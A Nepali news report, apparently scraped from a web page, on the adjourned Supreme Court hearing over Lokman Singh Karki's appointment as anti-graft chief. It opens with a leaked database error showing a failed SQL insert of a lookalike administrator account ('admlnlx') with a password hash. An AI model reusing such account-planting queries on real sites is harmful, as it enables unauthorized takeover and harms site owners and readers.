WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8dfztWgQ.4l4FBuuXi.l6wH7/7Ozw1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 14:48:41', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ८-
अख्तियार प्रमुख आयुक्तमा लोकमानसिंह कार्कीको नियुक्ति असंवैधानकि भन्दै परेको रिट निवेदनउपरको अर्को बहस पुस २१ हुने भएको छ।दुवै पक्षका वकिलहरुले बहस गर्न बाँकी भए पनि सुनुवाईलाई १२ दिन पर सारिएको छ। रिटमा बिहीबारदेखि सुनुवाई सुरु भएको थियो।
शुक्रबार बिहानदेखि सुरु भएको सुनुवाइमा सरकारी वकिलको तर्फबाट बहस भएपछि कार्कीका निजी कानुन व्यवसायीले बहस थालेका थिए। सहन्यायाधिवक्ता किरण पौडेलले बहस गरेपछि कार्कीको पक्षबाट माधव बस्नेत र बालकृष्ण न्यौपानेले पैरवी गरेका थिए। त्यसपछि अर्को सुनुवाई पुस २१ गते हुने जानकारी इजलासले दिएको थियो।
सर्वोच्चका न्यायाधीश ईश्वरप्रसाद खतिवडा, डा. आनन्दमोहन भट्टराई र अनिलकुमार सिन्हाको विशेष इजलासमा सुनुवाइ भइरहेको छ । कार्की र सरकारको तर्फबाट बहस सकिएपछि रिट निवेदक अधिवक्ता ओमप्रकाश अर्यालको पक्षबाट जवाफी बहस हुनेछ ।
बिहीबार रिट निवेदकका तर्फबाट अधिवक्ता रमेश बडाल, डा सुरेन्द्र भण्डारी, टीकाराम भट्टराई, गोविन्द बन्दी, डा चन्द्रकान्त ज्ञवाली, शम्भु थापा, रवि खनाल, सुनिल पोखरेल, विजय मिश्र लगायतले बहस गरेका थिए। उनीहरुले कार्कीको नियुक्ति संविधान विपरीत भएको जिकिर गरेका थिए।
कार्कीको नियुक्ति संविधान विपरीत भएको भन्दै अधिवक्ता ओमप्रकाश अर्यालले रिट निवेदन खारेज भइसके पनि त्यसलाई पुनरावलोकन गर्ने निर्णय सर्वोच्च अदालतले गरेको थियो ।